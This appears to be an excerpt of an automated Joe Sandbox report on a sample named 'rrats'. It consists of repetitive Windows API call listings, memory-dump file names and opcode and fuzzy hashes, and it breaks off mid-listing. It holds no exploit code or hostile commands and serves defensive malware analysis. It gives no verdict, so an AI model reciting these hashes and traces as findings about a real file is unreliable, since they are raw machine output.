                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 90fec3aec0d2bae908abbaca2a45468d0f3bed9514e3b3ada8d2a4c58d577e0e
                                                              • Instruction ID: 86f8ca01527850f7b079e2e337c3e8d453b0fd7d7904f77cca36dc65b69e7eaf
                                                              • Opcode Fuzzy Hash: 90fec3aec0d2bae908abbaca2a45468d0f3bed9514e3b3ada8d2a4c58d577e0e
                                                              • Instruction Fuzzy Hash: 21A001E62AD552BC3908625A6D46CFB025EC4C5F65B30C93EF916C45C2A891AC45A871
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                              • Instruction ID: 40be3938acde55064429fedaa63ebf63c0b7ae5a423d0fdb3be58e557473fe60
                                                              • Opcode Fuzzy Hash: a75701d738336d1f177580bb54f34baa2d275ae47c6a96efeb80aa9c3aff0495
                                                              • Instruction Fuzzy Hash: 60A011E22A80023C3A0822022C82CFB028EC0C0F28B30802EF820A00C0AC800C02A8B2
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: c3ef2273dc2896f76bf52f22204063e5f99dabf58288bee628e50d7e8d1424bb
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0c9844e05995801c76050b4ed9b1deea4d4b949a05698f1894d2340519e1c0a9
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: 0c9844e05995801c76050b4ed9b1deea4d4b949a05698f1894d2340519e1c0a9
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 213f8d9ff39be79cf0b355aff9430b0d2ed54e2c38636a9f8bb09b5a5bb71606
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: 213f8d9ff39be79cf0b355aff9430b0d2ed54e2c38636a9f8bb09b5a5bb71606
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5d0008ad0ff9f0fd4a5faf5e4276b089044dcf1244e015eb9becf0c49004fc4b
                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                              • Opcode Fuzzy Hash: 5d0008ad0ff9f0fd4a5faf5e4276b089044dcf1244e015eb9becf0c49004fc4b
                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,00CBAE72,C:\Users\user\Desktop,00000000,00CE946A,00000006), ref: 00CBAC08
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              APIs
                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CBC2B1
                                                              • EndDialog.USER32(?,00000006), ref: 00CBC2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 00CBC2E0
                                                              • SetFocus.USER32(00000000), ref: 00CBC2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CBC321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CBC358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00CBC36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CBC38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC39C
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC3D4
                                                              • _swprintf.LIBCMT ref: 00CBC404
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CBC417
                                                              • FindClose.KERNEL32(00000000), ref: 00CBC41E
                                                              • _swprintf.LIBCMT ref: 00CBC477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CBC48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CBC4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CBC4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC509
                                                              • _swprintf.LIBCMT ref: 00CBC535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CBC548
                                                              • _swprintf.LIBCMT ref: 00CBC59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CBC5AF
                                                                • Part of subcall function 00CBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
                                                                • Part of subcall function 00CBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                              • API String ID: 797121971-1840816070
APIs
• __EH_prolog.LIBCMT ref: 00CA6FAA
• _wcslen.LIBCMT ref: 00CA7013
• _wcslen.LIBCMT ref: 00CA7084
  • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
  • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
  • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
  • Part of subcall function 00CAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
  • Part of subcall function 00CAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CA7139
• CloseHandle.KERNEL32(00000000), ref: 00CA7155
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA7298
  • Part of subcall function 00CA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
  • Part of subcall function 00CA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
  • Part of subcall function 00CA9620: CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
  • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
  • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
Strings
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3983180755-3508440684
• Opcode ID: 54c17d03f59becc9dcb8a61d1c9c4aa96c5034dddd0be4cd66840f7c2f9da862
• Instruction ID: 08d419305b4f6166b7f805857684c725c2ca18e62bfc1db830bcec15feaf8c4f
• Opcode Fuzzy Hash: 54c17d03f59becc9dcb8a61d1c9c4aa96c5034dddd0be4cd66840f7c2f9da862
• Instruction Fuzzy Hash: 87C1F671D04646AEDB21DB74CD81FEEB3A8BF05308F04465AFA56E3282D734AB44DB61
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 56572648f5578abcc54e5af9c6105ce2cc0962c849cc100adf43838f49499196
• Instruction ID: acaf3d282290b71dd22dce5aa9a6266d9c423fa27db38f535bececcc449d75ea
• Opcode Fuzzy Hash: 56572648f5578abcc54e5af9c6105ce2cc0962c849cc100adf43838f49499196
• Instruction Fuzzy Hash: 11C23972E086288FDB25CE28DD40BEAB7B5EB45305F1541EED85EE7240E775AE818F40
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: H_prolog_swprintf
• String ID: CMT$h%u$hc%u
• API String ID: 146138363-3282847064
• Opcode ID: adb0ee080e3ee71c34e7cc1a6327e35fd7cff2541c6fbf63aa99995f9308d9d7
• Instruction ID: ad406c9547fbff3279ae05189fdabb5fb500e573eeb3ac8959e3e61a05839249
• Opcode Fuzzy Hash: adb0ee080e3ee71c34e7cc1a6327e35fd7cff2541c6fbf63aa99995f9308d9d7
• Instruction Fuzzy Hash: 5832F8715103869FDF14DF74C8A5AE93BA5AF16308F08047DFD9A8B283DB749A49CB60
APIs
• __EH_prolog.LIBCMT ref: 00CA2874
• _strlen.LIBCMT ref: 00CA2E3F
  • Part of subcall function 00CB02BA: __EH_prolog.LIBCMT ref: 00CB02BF
  • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046A), ref: 00CB1BA0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA2F91
Strings
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
• String ID: CMT
• API String ID: 1206968400-2756464174
• Opcode ID: 274f9fa9733736d25d105ce48a829e17c547c4fd505730aed28f7575b3aae032
• Instruction ID: 21d0624932639886989113e42201e11580dec51a4d9f7298c90350dc2869e111
• Opcode Fuzzy Hash: 274f9fa9733736d25d105ce48a829e17c547c4fd505730aed28f7575b3aae032
• Instruction Fuzzy Hash: 78624A715002968FDB19CF38C8957EA37A1EF56308F08457EFCAA8B283D7759A45CB60
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CBF844
• IsDebuggerPresent.KERNEL32 ref: 00CBF910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CBF930
• UnhandledExceptionFilter.KERNEL32(?), ref: 00CBF93A
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 245ad67ea0ae82be83ac1e40fd9e22694cc909971c62f8cb0ef73371c8f8863b
• Instruction ID: 2f71cf6470fd34a23f3ee7ab7b8892e2e8a314f073cb22a7f3a6e68f24debc68
• Opcode Fuzzy Hash: 245ad67ea0ae82be83ac1e40fd9e22694cc909971c62f8cb0ef73371c8f8863b
• Instruction Fuzzy Hash: D2312775D063199BDF21DFA4DD89BCCBBB8AF08304F1040AAE40CAB250EB719B859F45
APIs
• VirtualQuery.KERNEL32(80000000,00CBE5E8,0000001C,00CBE7DD,00000000,?,?,?,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6B4
• GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
